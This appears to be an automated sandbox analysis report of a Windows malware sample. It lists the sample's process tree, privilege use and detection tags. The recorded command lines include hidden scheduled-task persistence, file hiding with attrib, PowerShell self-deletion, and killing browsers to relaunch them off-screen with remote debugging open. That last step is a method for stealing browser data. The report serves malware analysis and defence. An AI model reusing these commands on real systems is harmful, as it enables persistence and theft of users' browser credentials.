pid Process 1168 1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe 1168 1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe 3568 skotes.exe 3568 skotes.exe 2628 NK4PJqi.exe 264 powershell.exe 264 powershell.exe 264 powershell.exe 2372 InstallUtil.exe 2372 InstallUtil.exe 2372 InstallUtil.exe 4404 vvcWObH.exe 3204 dxdiag.exe 3204 dxdiag.exe 5900 chrome.exe 5900 chrome.exe 1476 msedge.exe 1476 msedge.exe 3192 msedge.exe 3192 msedge.exe 4004 msedge.exe 4004 msedge.exe 6164 msedge.exe 6164 msedge.exe 5128 msedge.exe 5128 msedge.exe 6516 msedge.exe 6516 msedge.exe 5672 msedge.exe 5672 msedge.exe 5692 msedge.exe 5692 msedge.exe 4420 skotes.exe 4420 skotes.exe 1780 MicrosoftEdgeUpdateTaskMachineCoreSC.exe 100 explorer.exe 100 explorer.exe 3048 powershell.exe 3048 powershell.exe 3048 powershell.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe 100 explorer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2628 NK4PJqi.exe Token: SeDebugPrivilege 2628 NK4PJqi.exe Token: SeDebugPrivilege 2372 InstallUtil.exe Token: SeDebugPrivilege 264 powershell.exe Token: SeDebugPrivilege 4404 vvcWObH.exe Token: SeIncreaseQuotaPrivilege 5716 WMIC.exe Token: SeSecurityPrivilege 5716 WMIC.exe Token: SeTakeOwnershipPrivilege 5716 WMIC.exe Token: SeLoadDriverPrivilege 5716 WMIC.exe Token: SeSystemProfilePrivilege 5716 WMIC.exe Token: SeSystemtimePrivilege 5716 WMIC.exe Token: SeProfSingleProcessPrivilege 5716 WMIC.exe Token: SeIncBasePriorityPrivilege 5716 WMIC.exe Token: SeCreatePagefilePrivilege 5716 WMIC.exe Token: SeBackupPrivilege 5716 WMIC.exe Token: SeRestorePrivilege 5716 WMIC.exe Token: SeShutdownPrivilege 5716 WMIC.exe Token: SeDebugPrivilege 5716 WMIC.exe Token: SeSystemEnvironmentPrivilege 5716 WMIC.exe Token: SeRemoteShutdownPrivilege 5716 WMIC.exe Token: SeUndockPrivilege 5716 WMIC.exe Token: SeManageVolumePrivilege 5716 WMIC.exe Token: 33 5716 WMIC.exe Token: 34 5716 WMIC.exe Token: 35 5716 WMIC.exe Token: 36 5716 WMIC.exe Token: SeIncreaseQuotaPrivilege 5716 WMIC.exe Token: SeSecurityPrivilege 5716 WMIC.exe Token: SeTakeOwnershipPrivilege 5716 WMIC.exe Token: SeLoadDriverPrivilege 5716 WMIC.exe Token: SeSystemProfilePrivilege 5716 WMIC.exe Token: SeSystemtimePrivilege 5716 WMIC.exe Token: SeProfSingleProcessPrivilege 5716 WMIC.exe Token: SeIncBasePriorityPrivilege 5716 WMIC.exe Token: SeCreatePagefilePrivilege 5716 WMIC.exe Token: SeBackupPrivilege 5716 WMIC.exe Token: SeRestorePrivilege 5716 WMIC.exe Token: SeShutdownPrivilege 5716 WMIC.exe Token: SeDebugPrivilege 5716 WMIC.exe Token: SeSystemEnvironmentPrivilege 5716 WMIC.exe Token: SeRemoteShutdownPrivilege 5716 WMIC.exe Token: SeUndockPrivilege 5716 WMIC.exe Token: SeManageVolumePrivilege 5716 WMIC.exe Token: 33 5716 WMIC.exe Token: 34 5716 WMIC.exe Token: 35 5716 WMIC.exe Token: 36 5716 WMIC.exe Token: SeDebugPrivilege 2424 taskkill.exe Token: SeShutdownPrivilege 5900 chrome.exe Token: SeCreatePagefilePrivilege 5900 chrome.exe Token: SeShutdownPrivilege 5900 chrome.exe Token: SeCreatePagefilePrivilege 5900 chrome.exe Token: SeShutdownPrivilege 5900 chrome.exe Token: SeCreatePagefilePrivilege 5900 chrome.exe Token: SeShutdownPrivilege 5900 chrome.exe Token: SeCreatePagefilePrivilege 5900 chrome.exe Token: SeShutdownPrivilege 5900 chrome.exe Token: SeCreatePagefilePrivilege 5900 chrome.exe Token: SeDebugPrivilege 1644 taskkill.exe Token: SeDebugPrivilege 1412 taskkill.exe Token: SeDebugPrivilege 5756 taskkill.exe Token: SeDebugPrivilege 6168 taskkill.exe Token: SeDebugPrivilege 6928 taskkill.exe Token: SeDebugPrivilege 7008 taskkill.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 1168 1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe 5900 chrome.exe 5900 chrome.exe 5128 msedge.exe 100 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3204 dxdiag.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1168 wrote to memory of 3568 1168 1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe 82 PID 1168 wrote to memory of 3568 1168 1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe 82 PID 1168 wrote to memory of 3568 1168 1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe 82 PID 3568 wrote to memory of 2628 3568 skotes.exe 84 PID 3568 wrote to memory of 2628 3568 skotes.exe 84 PID 3568 wrote to memory of 2628 3568 skotes.exe 84 PID 3568 wrote to memory of 5028 3568 skotes.exe 85 PID 3568 wrote to memory of 5028 3568 skotes.exe 85 PID 5028 wrote to memory of 2512 5028 DU1zDwm.exe 99 PID 5028 wrote to memory of 2512 5028 DU1zDwm.exe 99 PID 5028 wrote to memory of 1648 5028 DU1zDwm.exe 87 PID 5028 wrote to memory of 1648 5028 DU1zDwm.exe 87 PID 5028 wrote to memory of 3608 5028 DU1zDwm.exe 88 PID 5028 wrote to memory of 3608 5028 DU1zDwm.exe 88 PID 5028 wrote to memory of 264 5028 DU1zDwm.exe 90 PID 5028 wrote to memory of 264 5028 DU1zDwm.exe 90 PID 2628 wrote to memory of 2372 2628 NK4PJqi.exe 93 PID 2628 wrote to memory of 2372 2628 NK4PJqi.exe 93 PID 2628 wrote to memory of 2372 2628 NK4PJqi.exe 93 PID 2628 wrote to memory of 2372 2628 NK4PJqi.exe 93 PID 2628 wrote to memory of 2372 2628 NK4PJqi.exe 93 PID 2628 wrote to memory of 2372 2628 NK4PJqi.exe 93 PID 2628 wrote to memory of 2372 2628 NK4PJqi.exe 93 PID 2628 wrote to memory of 2372 2628 NK4PJqi.exe 93 PID 264 wrote to memory of 4436 264 powershell.exe 95 PID 264 wrote to memory of 4436 264 powershell.exe 95 PID 3568 wrote to memory of 4404 3568 skotes.exe 100 PID 3568 wrote to memory of 4404 3568 skotes.exe 100 PID 4404 wrote to memory of 5224 4404 vvcWObH.exe 101 PID 4404 wrote to memory of 5224 4404 vvcWObH.exe 101 PID 5224 wrote to memory of 5716 5224 cmd.exe 103 PID 5224 wrote to memory of 5716 5224 cmd.exe 103 PID 4404 wrote to memory of 3204 4404 vvcWObH.exe 106 PID 4404 wrote to memory of 3204 4404 vvcWObH.exe 106 PID 4404 wrote to memory of 2424 4404 vvcWObH.exe 117 PID 4404 wrote to memory of 2424 4404 vvcWObH.exe 117 PID 4404 wrote to memory of 5900 4404 vvcWObH.exe 119 PID 4404 wrote to memory of 5900 4404 vvcWObH.exe 119 PID 5900 wrote to memory of 4764 5900 chrome.exe 120 PID 5900 wrote to memory of 4764 5900 chrome.exe 120 PID 5900 wrote to memory of 5712 5900 chrome.exe 121 PID 5900 wrote to memory of 5712 5900 chrome.exe 121 PID 5900 wrote to memory of 6720 5900 chrome.exe 122 PID 5900 wrote to memory of 6720 5900 chrome.exe 122 PID 5900 wrote to memory of 5604 5900 chrome.exe 123 PID 5900 wrote to memory of 5604 5900 chrome.exe 123 PID 5900 wrote to memory of 6124 5900 chrome.exe 124 PID 5900 wrote to memory of 6124 5900 chrome.exe 124 PID 5900 wrote to memory of 1008 5900 chrome.exe 125 PID 5900 wrote to memory of 1008 5900 chrome.exe 125 PID 5900 wrote to memory of 2484 5900 chrome.exe 128 PID 5900 wrote to memory of 2484 5900 chrome.exe 128 PID 4404 wrote to memory of 1644 4404 vvcWObH.exe 130 PID 4404 wrote to memory of 1644 4404 vvcWObH.exe 130 PID 4404 wrote to memory of 5128 4404 vvcWObH.exe 132 PID 4404 wrote to memory of 5128 4404 vvcWObH.exe 132 PID 5128 wrote to memory of 5308 5128 msedge.exe 133 PID 5128 wrote to memory of 5308 5128 msedge.exe 133 PID 5128 wrote to memory of 1476 5128 msedge.exe 134 PID 5128 wrote to memory of 1476 5128 msedge.exe 134 PID 5128 wrote to memory of 3192 5128 msedge.exe 135 PID 5128 wrote to memory of 3192 5128 msedge.exe 135 PID 5128 wrote to memory of 4004 5128 msedge.exe 136 PID 5128 wrote to memory of 4004 5128 msedge.exe 136 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 1648 attrib.exe 2512 attrib.exe
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵PID:792
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵PID:2512
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:904
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:896
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1112
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4420
-
-
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exeC:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1780 -
C:\Windows\explorer.exeexplorer.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3048 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.1.0.14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6620
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3284
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5316
-
-
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exeC:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1828 -
C:\Windows\explorer.exeexplorer.exe3⤵PID:424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4008
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1124
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1136
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1260
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1388
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2652
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"3⤵
- System Location Discovery: System Language Discovery
PID:5768
-
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"3⤵PID:3580
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1556
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1568
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1616
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1788
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1912
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1928
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:1756
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2172
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2224
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2860
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2876
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2244
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3444
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3536
-
C:\Users\Admin\AppData\Local\Temp\1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe"C:\Users\Admin\AppData\Local\Temp\1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Users\Admin\AppData\Local\Temp\1011308001\NK4PJqi.exe"C:\Users\Admin\AppData\Local\Temp\1011308001\NK4PJqi.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2628
-
-
C:\Users\Admin\AppData\Local\Temp\1011316001\DU1zDwm.exe"C:\Users\Admin\AppData\Local\Temp\1011316001\DU1zDwm.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\SYSTEM32\attrib.exeattrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe5⤵
- Views/modifies file attributes
PID:2512
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe5⤵
- Views/modifies file attributes
PID:1648
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE5⤵
- Scheduled Task/Job: Scheduled Task
PID:3608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.0.0.1; del DU1zDwm.exe5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:264 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.0.0.16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4436
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011339001\vvcWObH.exe"C:\Users\Admin\AppData\Local\Temp\1011339001\vvcWObH.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /c wmic path win32_videocontroller get caption5⤵
- Suspicious use of WriteProcessMemory
PID:5224 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_videocontroller get caption6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5716
-
-
-
C:\Windows\SYSTEM32\dxdiag.exe"dxdiag" /t C:\Users\Admin\AppData\Local\Temp\dxdiag.txt5⤵
- Drops file in System32 directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3204
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill" /F /IM chrome.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=12643 --profile-directory="Default" --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5900 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff852edcc40,0x7ff852edcc4c,0x7ff852edcc586⤵PID:4764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1924,i,14575467887940128394,10012735683273918065,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1920 /prefetch:26⤵PID:5712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --no-appcompat-clear --field-trial-handle=1960,i,14575467887940128394,10012735683273918065,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1980 /prefetch:36⤵PID:6720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=2044,i,14575467887940128394,10012735683273918065,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2056 /prefetch:86⤵PID:5604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=12643 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2880,i,14575467887940128394,10012735683273918065,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2900 /prefetch:16⤵
- Uses browser remote debugging
PID:6124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=12643 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2904,i,14575467887940128394,10012735683273918065,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3052 /prefetch:16⤵
- Uses browser remote debugging
PID:1008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=12643 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4072,i,14575467887940128394,10012735683273918065,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4028 /prefetch:16⤵
- Uses browser remote debugging
PID:2484
-
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill" /F /IM msedge.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=16144 --profile-directory="Default" --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5128 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff852d946f8,0x7ff852d94708,0x7ff852d947186⤵PID:5308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,9955402495169958789,5981813490539589118,131072 --no-sandbox --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2164 /prefetch:26⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,9955402495169958789,5981813490539589118,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2196 /prefetch:36⤵
- Suspicious behavior: EnumeratesProcesses
PID:3192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,9955402495169958789,5981813490539589118,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --mojo-platform-channel-handle=2688 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:4004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=16144 --field-trial-handle=2136,9955402495169958789,5981813490539589118,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:16⤵
- Uses browser remote debugging
- Suspicious behavior: EnumeratesProcesses
PID:6164
-
-
